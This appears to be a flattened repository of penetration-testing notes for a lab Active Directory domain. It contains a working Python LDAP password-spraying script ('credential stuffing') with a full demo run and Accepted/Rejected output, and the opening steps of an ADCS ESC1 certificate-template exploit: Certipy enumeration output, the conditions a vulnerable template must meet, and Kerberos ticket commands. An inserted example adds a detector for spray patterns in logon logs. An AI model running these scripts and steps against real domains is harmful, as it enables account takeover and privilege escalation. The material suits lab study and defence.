337 | l.painter
338 | m.palmer
339 | n.pastor
340 | o.peterson
341 | p.quill
342 | q.quimby
343 | u.quintrell
344 | r.ramsey
345 | s.ratliff
346 | t.richards
347 | u.roberts
348 | v.robinson
349 | w.scott
350 | x.simpson
351 | y.smith
352 | z.stewart
353 | a.taylor
354 | b.turner
355 | c.walsh
356 | d.ward
357 | e.webb
358 | f.west
359 | d.atkinson
360 | e.bailey
361 | f.baker
362 | g.ball
363 | h.bell
364 | i.brown
365 | j.burton
366 | k.carter
367 | l.clarke
368 | m.cole
369 | e.griffiths
370 | f.hall
371 | g.hamilton
372 | h.harris
373 | i.harvey
374 | j.hill
375 | k.jackson
376 | l.james
377 | k.yarrow
378 | l.yates
379 | m.young
380 | n.zachary
381 | o.zelly
382 | p.zinc
383 | q.zouch
384 | a.adams
385 | b.allen
386 | c.armstrong
387 | adm.adams
388 | adm.smith
389 | adm.stewart
390 | adm.natt
391 | adm.nelson
392 | svc_afds
393 | svc_test
394 | svc_mssql1
395 | svc_mssql2
396 | svc_lab
397 | svc_admin
398 | SR2000-1$
399 | SR2000-2$
400 | SR2000-3$
401 | SR2000-4$
402 | SR2000-5$
403 | SR2000-6$
404 | SR2003-1$
405 | SR2003-2$
406 | SR2003-3$
407 | SR2003-4$
408 | SR2003-5$
409 | SR2003-6$
410 | SR208-1$
411 | SR208-2$
412 | SR208-3$
413 | SR208-4$
414 | SR208-5$
415 | SR208-6$
416 | SR2012-1$
417 | SR2012-2$
418 | SR2012-3$
419 | SR2012-4$
420 | SR2019-1$
421 | SR2019-2$
422 | SR2019-3$
423 | SR2019-4$
424 | W7-1$
425 | W7-2$
426 | W7-3$
427 | W7-4$
428 | W7-5$
429 | W7-6$
430 | XP-1$
431 | WIN-10-LAB$
432 | WIN-10-LAB-2$
433 | Tom_ADM
434 | kay1
435 | ubuntu@ubuntu-virtual-machine:~/Documents/Tools$
436 | ```
437 |
438 | **Domain credential stuffing script**
439 |
440 | This script needs ldap3
441 |
442 | ```
443 | pip install ldap3
444 | ```
445 |
446 | Save the below as AD_Creds.py
447 |
448 | ```
449 | import argparse
450 | from ldap3 import Server, Connection, ALL, SUBTREE, core
451 | from ldap3.core.exceptions import LDAPException
452 |
453 | def authenticate(username, domain, password, domain_controller):
454 |     user_dn = f"{username}@{domain}"
455 |     server = Server(domain_controller, get_info=ALL)
456 |
457 |     try:
458 |         conn = Connection(server, user=user_dn, password=password, auto_bind=True)
459 |         if conn.bind():
460 |             return True
461 |         else:
462 |             return False
463 |     except LDAPException:
464 |         return False
465 |
466 | if __name__ == "__main__":
467 |     parser = argparse.ArgumentParser(description="Authenticate and check AD users")
468 |     parser.add_argument("-u", "--usernames", nargs="+", required=True, help="One or more usernames to check")
469 |     parser.add_argument("-p", "--password", required=True, help="Password")
470 |     parser.add_argument("-d", "--domain", required=True, help="Domain")
471 |     parser.add_argument("-dc", "--domain_controller", required=True, help="Domain Controller Hostname")
472 |
473 |     args = parser.parse_args()
474 |
475 |     for username in args.usernames:
476 |         if authenticate(username, args.domain, args.password, args.domain_controller):
477 |             print(f"Accepted: {username}")
478 |         else:
479 |             print(f"Rejected: {username}")
480 | ```
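
Added example, not part of the original repository: one password tried once against a long list of accounts from a single host, as the script above does, leaves a recognisable pattern in the DC's logon auditing (for example Event ID 4625 failures and 4624 successes). The Python below splits each source's logon records into bursts and reports bursts that touch many accounts with few tries per account; the CSV layout, thresholds, source addresses and function names are assumptions, and the sample records are constructed, with account names and outcomes taken from the demo output on this page.

```python
import csv
import io
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample: (account, outcome) pairs as one source would produce them.
SPRAYED = [
    ("Administrator", "success"), ("Guest", "failure"), ("krbtgt", "failure"),
    ("da1", "success"), ("n.collins", "success"), ("o.davidson", "success"),
    ("p.davies", "success"), ("b.smith", "failure"), ("c.johnason", "failure"),
    ("d.thomas", "failure"), ("e.miller", "failure"), ("g.williams", "failure"),
]
SAMPLE_CSV = (
    "time,source,account,outcome\n"
    + "".join(
        f"2024-11-28T21:00:{i:02d},192.168.68.50,{account},{outcome}\n"
        for i, (account, outcome) in enumerate(SPRAYED)
    )
    # An ordinary user mistyping a password twice from another workstation.
    + "2024-11-28T09:01:10,192.168.68.77,g.white,failure\n"
    + "2024-11-28T09:01:25,192.168.68.77,g.white,failure\n"
    + "2024-11-28T09:01:40,192.168.68.77,g.white,success\n"
)


def bursts(events, max_gap):
    """Split one source's time-ordered events into bursts separated by idle gaps."""
    current = []
    for event in events:
        if current and event["time"] - current[-1]["time"] > max_gap:
            yield current
            current = []
        current.append(event)
    if current:
        yield current


def detect_spray(csv_text, max_gap=timedelta(minutes=2), min_accounts=10,
                 max_tries_per_account=2):
    """Return one alert per burst that tries many accounts only a few times each."""
    by_source = defaultdict(list)
    for row in csv.DictReader(io.StringIO(csv_text)):
        row["time"] = datetime.fromisoformat(row["time"])
        row["account"] = row["account"].lower()
        by_source[row["source"]].append(row)

    alerts = []
    for source in sorted(by_source):
        events = sorted(by_source[source], key=lambda e: e["time"])
        for burst in bursts(events, max_gap):
            tries = Counter(e["account"] for e in burst)
            # Many accounts, few tries each: the opposite shape of a brute force
            # against one account, and of a user mistyping their own password.
            if len(tries) < min_accounts or max(tries.values()) > max_tries_per_account:
                continue
            alerts.append({
                "source": source,
                "first_seen": burst[0]["time"],
                "accounts_tried": len(tries),
                "accepted": sorted({e["account"] for e in burst
                                    if e["outcome"] == "success"}),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_CSV):
        print(alert)
```

Every account under `accepted` authenticated during the burst, so those are the ones to reset first.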
481 |
482 | **Demo using the Domain credential stuffing script**
483 |
484 | python3 AD_Creds.py -u Add-Username -p 'Add-Password' -d Add-Domain -dc Add-DC-Host-Name-or-IP-Address
485 |
486 | ```
487 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ python3 AD_Creds.py -u Administrator Guest WIN-8HPLF8PSHC1$ krbtgt da1 n.collins o.davidson p.davies q.dawson u.dixon r.edwards s.elliot t.evans u.fisher v.fletcher w.ford x.foster y.fox z.gibson a.graham b.grant c.gray d.green b.smith c.johnason d.thomas e.miller f.johnsson g.williams t.harris i.jackson t.wilsson k.mmoore l.martsinez m.marjtinez n.anderson o.thompson p.thompson q.lewis r.robinson s.sancshez t.clark u.hernandez v.hill w.king x.rossi y.darrdvis z.perez a.white b.jackson c.smith d.taylor e.martin f.thoffmas g.hernandez h.rodrgviguez i.johncson j.miller k.jones l.davsris m.andessrson y.johnfson o.mooore p.clark q.thomdas r.martianez s.wiloson t.robinson u.marteinez v.sancahez w.moorre x.thompson y.martsinez z.hernandez a.miller b.rodriseguez c.anderson d.sancahez e.wilison f.davrtsis g.mooree h.thomddfas z.johnsson j.martainez k.rodrigfduez l.sanchdez m.clark n.davdemis o.wilwson p.robinson q.hernandez r.martiynez s.anderson t.johnsron u.rodrigkjuez v.sancghez w.wilsaon x.davifis y.moossre z.thomssas a.martinuez b.hernandez c.robinson d.clark e.jodhnson f.sanwchez g.wilpson h.davxris i.moofrre j.massrtainez k.rodrijguez l.sancahez m.anderson n.johnsson o.martiwnez p.hernandez q.wiloson r.davirws s.moewore t.thoweermas u.johnslon v.martienez w.rodrisguez x.sanchgez y.wilison z.davsdis a.clark b.johndson c.martiwnez d.rodrigruez e.sanchjez f.wilyson g.davioos h.mooeere i.thomas j.johnhson k.martiunez l.rodrigiuez m.sanychez n.wiwlson o.daviuus p.moorrre q.thdddomas r.johntson s.marttinez t.rodrieguez u.sancrhez v.wilsion w.davccis x.moowsxre y.thomeeeas z.johnqson a.martwinez b.rodrigutuez c.sanczhez d.wilsuion e.daerfvis f.mooure g.thomeeeas h.johnsson i.martinwez j.rodrwyiguez k.sanchiez l.wilyson m.davssis n.moorcre o.thomderas p.johnsson q.maratinez r.rodrieyguez s.sancyhez t.wilseon u.daytvis v.mocdore w.thomattts x.johnsaon y.martihnez z.rodrirtguez a.sanchtez b.wilswon c.davyis 
d.moodsre e.thomfffas f.johnso g.martinjez h.rodrigwuez i.sancohez j.wilesosn k.dawerris l.moouiyre m.thogghmas n.johseeson o.martidnez p.rodrasiguez q.sanchpez r.wilsson s.daveeris t.moodce u.thomhhas v.jhnson w.martfinez x.rodrifguez y.sancuhez z.wilsaon a.davihhuus b.mootfre c.thomhhsas d.johnsaon e.martidfnez f.rodridfguez g.sancthez h.wilzson i.davffis j.moodckre k.thomeweas l.johnon m.martiynez n.rodrsiguez o.sanrchez p.wiltson q.davfwfis r.mooyre m.jenkins n.johnson o.jones g.white h.yalden i.yarbury j.yardley z.mcdonald a.murphy b.natt c.nelson d.nightingale e.nixon f.nutter p.kelly q.kennedy u.king r.knight s.lawrence t.lee u.lewis v.lloyd w.marshall x.martin y.mason g.dell h.osborne i.owen j.oxley k.page l.painter m.palmer n.pastor o.peterson p.quill q.quimby u.quintrell r.ramsey s.ratliff t.richards u.roberts v.robinson w.scott x.simpson y.smith z.stewart a.taylor b.turner c.walsh d.ward e.webb f.west d.atkinson e.bailey f.baker g.ball h.bell i.brown j.burton k.carter l.clarke m.cole e.griffiths f.hall g.hamilton h.harris i.harvey j.hill k.jackson l.james k.yarrow l.yates m.young n.zachary o.zelly p.zinc q.zouch a.adams b.allen c.armstrong adm.adams adm.smith adm.stewart adm.natt adm.nelson svc_afds svc_test svc_mssql1 svc_mssql2 svc_lab svc_admin SR2000-1$ SR2000-2$ SR2000-3$ SR2000-4$ SR2000-5$ SR2000-6$ SR2003-1$ SR2003-2$ SR2003-3$ SR2003-4$ SR2003-5$ SR2003-6$ SR208-1$ SR208-2$ SR208-3$ SR208-4$ SR208-5$ SR208-6$ SR2012-1$ SR2012-2$ SR2012-3$ SR2012-4$ SR2019-1$ SR2019-2$ SR2019-3$ SR2019-4$ W7-1$ W7-2$ W7-3$ W7-4$ W7-5$ W7-6$ XP-1$ WIN-10-LAB$ WIN-10-LAB-2$ Tom_ADM kay1 -p 'Passw0rd!' -d hacklab.local -dc 192.168.68.230
488 | Accepted: Administrator
489 | Rejected: Guest
490 | Rejected: WIN-8HPLF8PSHC1$
491 | Rejected: krbtgt
492 | Accepted: da1
493 | Accepted: n.collins
494 | Accepted: o.davidson
495 | Accepted: p.davies
496 | Accepted: q.dawson
497 | Accepted: u.dixon
498 | Accepted: r.edwards
499 | Accepted: s.elliot
500 | Accepted: t.evans
501 | Accepted: u.fisher
502 | Accepted: v.fletcher
503 | Accepted: w.ford
504 | Accepted: x.foster
505 | Accepted: y.fox
506 | Accepted: z.gibson
507 | Accepted: a.graham
508 | Accepted: b.grant
509 | Accepted: c.gray
510 | Accepted: d.green
511 | Rejected: b.smith
512 | Rejected: c.johnason
513 | Rejected: d.thomas
514 | Rejected: e.miller
515 | Rejected: f.johnsson
516 | Rejected: g.williams
517 | Rejected: t.harris
518 | Rejected: i.jackson
519 | Rejected: t.wilsson
520 | Rejected: k.mmoore
521 | Rejected: l.martsinez
522 | Rejected: m.marjtinez
523 | Rejected: n.anderson
524 | Rejected: o.thompson
525 | Rejected: p.thompson
526 | Rejected: q.lewis
527 | Rejected: r.robinson
528 | Rejected: s.sancshez
529 | Rejected: t.clark
530 | Rejected: u.hernandez
531 | Rejected: v.hill
532 | Rejected: w.king
533 | Rejected: x.rossi
534 | Rejected: y.darrdvis
535 | Rejected: z.perez
536 | Rejected: a.white
537 | Rejected: b.jackson
538 | Rejected: c.smith
539 | Rejected: d.taylor
540 | Rejected: e.martin
541 | Rejected: f.thoffmas
542 | Rejected: g.hernandez
543 | Rejected: h.rodrgviguez
544 | Rejected: i.johncson
545 | Rejected: j.miller
546 | Rejected: k.jones
547 | Rejected: l.davsris
548 | Rejected: m.andessrson
549 | Rejected: y.johnfson
550 | Rejected: o.mooore
551 | Rejected: p.clark
552 | Rejected: q.thomdas
553 | Rejected: r.martianez
554 | Rejected: s.wiloson
555 | Rejected: t.robinson
556 | Rejected: u.marteinez
557 | Rejected: v.sancahez
558 | Rejected: w.moorre
559 | Rejected: x.thompson
560 | Rejected: y.martsinez
561 | Rejected: z.hernandez
562 | Rejected: a.miller
563 | Rejected: b.rodriseguez
564 | Rejected: c.anderson
565 | Rejected: d.sancahez
566 | Rejected: e.wilison
567 | Rejected: f.davrtsis
568 | Rejected: g.mooree
569 | Rejected: h.thomddfas
570 | Rejected: z.johnsson
571 | Rejected: j.martainez
572 | Rejected: k.rodrigfduez
573 | Rejected: l.sanchdez
574 | Rejected: m.clark
575 | Rejected: n.davdemis
576 | Rejected: o.wilwson
577 | Rejected: p.robinson
578 | Rejected: q.hernandez
579 | Rejected: r.martiynez
580 | Rejected: s.anderson
581 | Rejected: t.johnsron
582 | Rejected: u.rodrigkjuez
583 | Rejected: v.sancghez
584 | Rejected: w.wilsaon
585 | Rejected: x.davifis
586 | Rejected: y.moossre
587 | Rejected: z.thomssas
588 | Rejected: a.martinuez
589 | Rejected: b.hernandez
590 | Rejected: c.robinson
591 | Rejected: d.clark
592 | Rejected: e.jodhnson
593 | Rejected: f.sanwchez
594 | Rejected: g.wilpson
595 | Rejected: h.davxris
596 | Rejected: i.moofrre
597 | Rejected: j.massrtainez
598 | Rejected: k.rodrijguez
599 | Rejected: l.sancahez
600 | Rejected: m.anderson
601 | Rejected: n.johnsson
602 | Rejected: o.martiwnez
603 | Rejected: p.hernandez
604 | Rejected: q.wiloson
605 | Rejected: r.davirws
606 | Rejected: s.moewore
607 | Rejected: t.thoweermas
608 | Rejected: u.johnslon
609 | Rejected: v.martienez
610 | Rejected: w.rodrisguez
611 | Rejected: x.sanchgez
612 | Rejected: y.wilison
613 | Rejected: z.davsdis
614 | Rejected: a.clark
615 | Rejected: b.johndson
616 | Rejected: c.martiwnez
617 | Rejected: d.rodrigruez
618 | Rejected: e.sanchjez
619 | Rejected: f.wilyson
620 | Rejected: g.davioos
621 | Rejected: h.mooeere
622 | Rejected: i.thomas
623 | Rejected: j.johnhson
624 | Rejected: k.martiunez
625 | Rejected: l.rodrigiuez
626 | Rejected: m.sanychez
627 | Rejected: n.wiwlson
628 | Rejected: o.daviuus
629 | Rejected: p.moorrre
630 | Rejected: q.thdddomas
631 | Rejected: r.johntson
632 | Rejected: s.marttinez
633 | Rejected: t.rodrieguez
634 | Rejected: u.sancrhez
635 | Rejected: v.wilsion
636 | Rejected: w.davccis
637 | Rejected: x.moowsxre
638 | Rejected: y.thomeeeas
639 | Rejected: z.johnqson
640 | Rejected: a.martwinez
641 | Rejected: b.rodrigutuez
642 | Rejected: c.sanczhez
643 | Rejected: d.wilsuion
644 | Rejected: e.daerfvis
645 | Rejected: f.mooure
646 | Rejected: g.thomeeeas
647 | Rejected: h.johnsson
648 | Rejected: i.martinwez
649 | Rejected: j.rodrwyiguez
650 | Rejected: k.sanchiez
651 | Rejected: l.wilyson
652 | Rejected: m.davssis
653 | Rejected: n.moorcre
654 | Rejected: o.thomderas
655 | Rejected: p.johnsson
656 | Rejected: q.maratinez
657 | Rejected: r.rodrieyguez
658 | Rejected: s.sancyhez
659 | Rejected: t.wilseon
660 | Rejected: u.daytvis
661 | Rejected: v.mocdore
662 | Rejected: w.thomattts
663 | Rejected: x.johnsaon
664 | Rejected: y.martihnez
665 | Rejected: z.rodrirtguez
666 | Rejected: a.sanchtez
667 | Rejected: b.wilswon
668 | Rejected: c.davyis
669 | Rejected: d.moodsre
670 | Rejected: e.thomfffas
671 | Rejected: f.johnso
672 | Rejected: g.martinjez
673 | Rejected: h.rodrigwuez
674 | Rejected: i.sancohez
675 | Rejected: j.wilesosn
676 | Rejected: k.dawerris
677 | Rejected: l.moouiyre
678 | Rejected: m.thogghmas
679 | Rejected: n.johseeson
680 | Rejected: o.martidnez
681 | Rejected: p.rodrasiguez
682 | Rejected: q.sanchpez
683 | Rejected: r.wilsson
684 | Rejected: s.daveeris
685 | Rejected: t.moodce
686 | Rejected: u.thomhhas
687 | Rejected: v.jhnson
688 | Rejected: w.martfinez
689 | Rejected: x.rodrifguez
690 | Rejected: y.sancuhez
691 | Rejected: z.wilsaon
692 | Rejected: a.davihhuus
693 | Rejected: b.mootfre
694 | Rejected: c.thomhhsas
695 | Rejected: d.johnsaon
696 | Rejected: e.martidfnez
697 | Rejected: f.rodridfguez
698 | Rejected: g.sancthez
699 | Rejected: h.wilzson
700 | Rejected: i.davffis
701 | Rejected: j.moodckre
702 | Rejected: k.thomeweas
703 | Accepted: l.johnon
704 | Rejected: m.martiynez
705 | Rejected: n.rodrsiguez
706 | Rejected: o.sanrchez
707 | Rejected: p.wiltson
708 | Rejected: q.davfwfis
709 | Rejected: r.mooyre
710 | Rejected: m.jenkins
711 | Rejected: n.johnson
712 | Rejected: o.jones
713 | Accepted: g.white
714 | Rejected: h.yalden
715 | Rejected: i.yarbury
716 | Rejected: j.yardley
717 | Rejected: z.mcdonald
718 | Rejected: a.murphy
719 | Rejected: b.natt
720 | Rejected: c.nelson
721 | Rejected: d.nightingale
722 | Rejected: e.nixon
723 | Rejected: f.nutter
724 | Rejected: p.kelly
725 | Rejected: q.kennedy
726 | Rejected: u.king
727 | Rejected: r.knight
728 | Rejected: s.lawrence
729 | Rejected: t.lee
730 | Rejected: u.lewis
731 | Rejected: v.lloyd
732 | Rejected: w.marshall
733 | Rejected: x.martin
734 | Rejected: y.mason
735 | Rejected: g.dell
736 | Rejected: h.osborne
737 | Rejected: i.owen
738 | Rejected: j.oxley
739 | Rejected: k.page
740 | Rejected: l.painter
741 | Rejected: m.palmer
742 | Rejected: n.pastor
743 | Rejected: o.peterson
744 | Rejected: p.quill
745 | Rejected: q.quimby
746 | Rejected: u.quintrell
747 | Rejected: r.ramsey
748 | Rejected: s.ratliff
749 | Rejected: t.richards
750 | Rejected: u.roberts
751 | Rejected: v.robinson
752 | Rejected: w.scott
753 | Rejected: x.simpson
754 | Rejected: y.smith
755 | Rejected: z.stewart
756 | Rejected: a.taylor
757 | Rejected: b.turner
758 | Rejected: c.walsh
759 | Rejected: d.ward
760 | Rejected: e.webb
761 | Rejected: f.west
762 | Rejected: d.atkinson
763 | Rejected: e.bailey
764 | Rejected: f.baker
765 | Rejected: g.ball
766 | Rejected: h.bell
767 | Rejected: i.brown
768 | Rejected: j.burton
769 | Rejected: k.carter
770 | Rejected: l.clarke
771 | Rejected: m.cole
772 | Rejected: e.griffiths
773 | Rejected: f.hall
774 | Rejected: g.hamilton
775 | Rejected: h.harris
776 | Rejected: i.harvey
777 | Rejected: j.hill
778 | Rejected: k.jackson
779 | Rejected: l.james
780 | Rejected: k.yarrow
781 | Rejected: l.yates
782 | Rejected: m.young
783 | Rejected: n.zachary
784 | Rejected: o.zelly
785 | Rejected: p.zinc
786 | Rejected: q.zouch
787 | Rejected: a.adams
788 | Accepted: b.allen
789 | Rejected: c.armstrong
790 | Rejected: adm.adams
791 | Rejected: adm.smith
792 | Rejected: adm.stewart
793 | Rejected: adm.natt
794 | Rejected: adm.nelson
795 | Rejected: svc_afds
796 | Rejected: svc_test
797 | Rejected: svc_mssql1
798 | Rejected: svc_mssql2
799 | Rejected: svc_lab
800 | Accepted: svc_admin
801 | Rejected: SR2000-1$
802 | Rejected: SR2000-2$
803 | Rejected: SR2000-3$
804 | Rejected: SR2000-4$
805 | Rejected: SR2000-5$
806 | Rejected: SR2000-6$
807 | Rejected: SR2003-1$
808 | Rejected: SR2003-2$
809 | Rejected: SR2003-3$
810 | Rejected: SR2003-4$
811 | Rejected: SR2003-5$
812 | Rejected: SR2003-6$
813 | Rejected: SR208-1$
814 | Rejected: SR208-2$
815 | Rejected: SR208-3$
816 | Rejected: SR208-4$
817 | Rejected: SR208-5$
818 | Rejected: SR208-6$
819 | Rejected: SR2012-1$
820 | Rejected: SR2012-2$
821 | Rejected: SR2012-3$
822 | Rejected: SR2012-4$
823 | Rejected: SR2019-1$
824 | Rejected: SR2019-2$
825 | Rejected: SR2019-3$
826 | Rejected: SR2019-4$
827 | Rejected: W7-1$
828 | Rejected: W7-2$
829 | Rejected: W7-3$
830 | Rejected: W7-4$
831 | Rejected: W7-5$
832 | Rejected: W7-6$
833 | Rejected: XP-1$
834 | Rejected: WIN-10-LAB$
835 | Rejected: WIN-10-LAB-2$
836 | Rejected: Tom_ADM
837 | Accepted: kay1
838 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$
839 | ```
840 |
841 |
--------------------------------------------------------------------------------
/Active_Directory_Certificate_Service_ADCS.md:
--------------------------------------------------------------------------------
1 | **Some notes on Active Directory Certificate Services (ADCS) Exploitation**
2 |
3 | This is a good video https://youtu.be/wozcGjAsfZ0?si=1LJ4wjcHEblrV_4P which explains AD CS ESC1 privilege escalation, and also shows how to configure the vulnerable certificate and how to remediate it.
4 |
5 | **Using Certipy which is arguably the easier method.**
6 |
7 | **Install certipy in Ubuntu**
8 |
9 | Create a Python virtualenv, which is an isolated Python environment that lets you install and update any tool without the risk of impacting other Python tools.
10 |
11 | ```
12 | mkdir Tools
13 | sudo apt install python3.10-venv
14 |
15 | ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ python3 -m venv .
16 | ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ source bin/activate
17 | ```
18 |
19 | To return to the normal environment, type deactivate
20 |
21 | ```
22 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ deactivate
23 | ubuntu@ubuntu-virtual-machine:~/Documents/Tools$
24 | ```
25 |
26 | To return to the virtual environment, activate it again
27 |
28 | ```
29 | # The venv already exists, so only activation is needed (no sudo, no re-creation)
30 | ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ source bin/activate
31 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$
32 | ```
33 |
34 | Then install certipy-ad into your new isolated Python environment
35 |
36 | ```
37 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ pip3 install certipy-ad
38 | ```
39 | And install ldap3
40 |
41 | ```
42 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ pip3 install git+https://github.com/ly4k/ldap3
43 | ```
44 |
45 | **Locate AD CS ESC1 vulnerable certificates and exploit them**
46 |
47 | 1. Find the certs
48 |
49 | ```
50 | certipy find -u g.white -p "Passw0rd!" -dc-ip 192.168.68.230 -scheme ldaps -ldap-channel-binding
51 | Certipy v4.8.2 - by Oliver Lyak (ly4k)
52 |
53 | [*] Finding certificate templates
54 | [*] Found 35 certificate templates
55 | [*] Finding certificate authorities
56 | [*] Found 1 certificate authority
57 | [*] Found 13 enabled certificate templates
58 | [*] Trying to get CA configuration for 'hacklab-WIN-8HPLF8PSHC1-CA' via CSRA
59 | [!] Got error while trying to get CA configuration for 'hacklab-WIN-8HPLF8PSHC1-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
60 | [*] Trying to get CA configuration for 'hacklab-WIN-8HPLF8PSHC1-CA' via RRP
61 | [!] Failed to connect to remote registry. Service should be starting now. Trying again...
62 | [*] Got CA configuration for 'hacklab-WIN-8HPLF8PSHC1-CA'
63 | [*] Saved BloodHound data to '20240701104154_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
64 | [*] Saved text output to '20240701104154_Certipy.txt'
65 | [*] Saved JSON output to '20240701104154_Certipy.json'
66 | ```
67 |
68 | 2. Review the cert output.
69 |
70 | ```
71 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ gedit 20240701104154_Certipy.txt
72 |
73 | Certificate Authorities
74 | 0
75 | CA Name : hacklab-WIN-8HPLF8PSHC1-CA
76 | DNS Name : WIN-8HPLF8PSHC1.hacklab.local
77 | Certificate Subject : CN=hacklab-WIN-8HPLF8PSHC1-CA, DC=hacklab, DC=local
78 | Certificate Serial Number : 354DB064F33080BD4EB9FEAABE87DCF1
79 | Certificate Validity Start : 2024-04-23 13:56:37+00:00
80 | Certificate Validity End : 2029-04-23 14:06:33+00:00
81 | Web Enrollment : Disabled
82 | User Specified SAN : Disabled
83 | Request Disposition : Issue
84 | Enforce Encryption for Requests : Enabled
85 | Permissions
86 | Owner : HACKLAB.LOCAL\Administrators
87 | Access Rights
88 | ManageCertificates : HACKLAB.LOCAL\Administrators
89 | HACKLAB.LOCAL\Domain Admins
90 | HACKLAB.LOCAL\Enterprise Admins
91 | ManageCa : HACKLAB.LOCAL\Administrators
92 | HACKLAB.LOCAL\Domain Admins
93 | HACKLAB.LOCAL\Enterprise Admins
94 | Enroll : HACKLAB.LOCAL\Authenticated Users
95 | Certificate Templates
96 | 0
97 | Template Name : ESC3-Vuln2
98 | Display Name : ESC3-Vuln2
99 | Enabled : False
100 | Client Authentication : True
101 | Enrollment Agent : True
102 | Any Purpose : False
103 | Enrollee Supplies Subject : False
104 | Certificate Name Flag : SubjectRequireDirectoryPath
105 | SubjectRequireEmail
106 | SubjectAltRequireEmail
107 | SubjectAltRequireUpn
108 | Enrollment Flag : AutoEnrollment
109 | PublishToDs
110 | IncludeSymmetricAlgorithms
111 | Private Key Flag : 16777216
112 | 65536
113 | ExportableKey
114 | Extended Key Usage : Smart Card Logon
115 | Server Authentication
116 | KDC Authentication
117 | Secure Email
118 | Microsoft Trust List Signing
119 | Encrypting File System
120 | Client Authentication
121 | Certificate Request Agent
122 | Requires Manager Approval : False
123 | Requires Key Archival : False
124 | Authorized Signatures Required : 0
125 | Validity Period : 1 year
126 | Renewal Period : 6 weeks
127 | Minimum RSA Key Length : 2048
128 | Permissions
129 | Enrollment Permissions
130 | Enrollment Rights : HACKLAB.LOCAL\Domain Admins
131 | HACKLAB.LOCAL\Enterprise Admins
132 | Object Control Permissions
133 | Owner : HACKLAB.LOCAL\Administrator
134 | Full Control Principals : HACKLAB.LOCAL\Domain Users
135 | Write Owner Principals : HACKLAB.LOCAL\Domain Admins
136 | HACKLAB.LOCAL\Enterprise Admins
137 | HACKLAB.LOCAL\Administrator
138 | HACKLAB.LOCAL\Domain Users
139 | Write Dacl Principals : HACKLAB.LOCAL\Domain Admins
140 | HACKLAB.LOCAL\Enterprise Admins
141 | HACKLAB.LOCAL\Administrator
142 | HACKLAB.LOCAL\Domain Users
143 | Write Property Principals : HACKLAB.LOCAL\Domain Admins
144 | HACKLAB.LOCAL\Enterprise Admins
145 | HACKLAB.LOCAL\Administrator
146 | HACKLAB.LOCAL\Domain Users
147 | [!] Vulnerabilities
148 | ESC3 : 'HACKLAB.LOCAL\\Domain Users' can enroll and template has Certificate Request Agent EKU set
149 | ESC4 : 'HACKLAB.LOCAL\\Domain Users' has dangerous permissions
150 | 1
151 | Template Name : ESC1-Vun1
152 | Display Name : ESC1-Vun1
153 | Certificate Authorities : hacklab-WIN-8HPLF8PSHC1-CA - **Note you need this info**.
154 | Enabled : True - ** Note to exploit this needs to be enabled **.
155 | Client Authentication : True - ** Note to exploit this needs to be enabled **.
156 | Enrollment Agent : False
157 | Any Purpose : False
158 | Enrollee Supplies Subject : True - ** Note to exploit this needs to be enabled **.
159 | Certificate Name Flag : EnrolleeSuppliesSubject
160 | Enrollment Flag : PublishToDs
161 | Private Key Flag : 16777216
162 | 65536
163 | Extended Key Usage : Server Authentication
164 | Client Authentication
165 | Requires Manager Approval : False
166 | Requires Key Archival : False
167 | Authorized Signatures Required : 0
168 | Validity Period : 1 year
169 | Renewal Period : 6 weeks
170 | Minimum RSA Key Length : 2048
171 | Permissions
172 | Enrollment Permissions
173 | Enrollment Rights : HACKLAB.LOCAL\Domain Users - ** Note to exploit this Domain Users needs to be enabled or Domain Computers **.
174 | HACKLAB.LOCAL\Domain Admins
175 | HACKLAB.LOCAL\Domain Computers
176 | HACKLAB.LOCAL\Enterprise Admins
177 | HACKLAB.LOCAL\Authenticated Users
178 | Object Control Permissions
179 | Owner : HACKLAB.LOCAL\Administrator
180 | Write Owner Principals : HACKLAB.LOCAL\Domain Admins
181 | HACKLAB.LOCAL\Enterprise Admins
182 | HACKLAB.LOCAL\Administrator
183 | Write Dacl Principals : HACKLAB.LOCAL\Domain Admins
184 | HACKLAB.LOCAL\Enterprise Admins
185 | HACKLAB.LOCAL\Administrator
186 | Write Property Principals : HACKLAB.LOCAL\Domain Admins
187 | HACKLAB.LOCAL\Enterprise Admins
188 | HACKLAB.LOCAL\Administrator
189 | [!] Vulnerabilities
190 | ESC1 : 'HACKLAB.LOCAL\\Domain Users', 'HACKLAB.LOCAL\\Domain Computers' and 'HACKLAB.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
191 | ```
192 |
193 | The certipy tool highlights certs that are vulnerable by appending [!] Vulnerabilities ESC1 at the end of the certificate's entry. The following sections are required to exploit a cert.
194 |
195 | From the Certificate Authorities section, you need the CA Name and the DNS Name, which in this example is the domain controller's host name.
196 |
197 | ```
198 | 0
199 | CA Name : hacklab-WIN-8HPLF8PSHC1-CA
200 | DNS Name : WIN-8HPLF8PSHC1.hacklab.local
201 | ```
202 |
203 | **Next, for a certificate to be vulnerable, its configuration must be set as defined below.**
204 |
205 | ```
206 | Template Name : Add_Vulnerable_ Certs_Name
207 | Enabled : True
208 | Client Authentication : True
209 | Enrollee Supplies Subject : True
210 |
211 | Enrollment Rights : HACKLAB.LOCAL\Domain Users
212 | ```
213 |
214 |
215 |
216 | 3. Create a TGT
217 |
218 | ```
219 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ getTGT.py hacklab.local/g.white:'Passw0rd!' -dc-ip 192.168.68.230
220 | Impacket v0.11.0 - Copyright 2023 Fortra
221 |
222 | [*] Saving ticket in g.white.ccache
223 | ```
224 |
225 | 4. Export the TGT
226 |
227 | ```
228 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ export KRB5CCNAME=g.white.ccache
229 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$
230 | ```
231 |
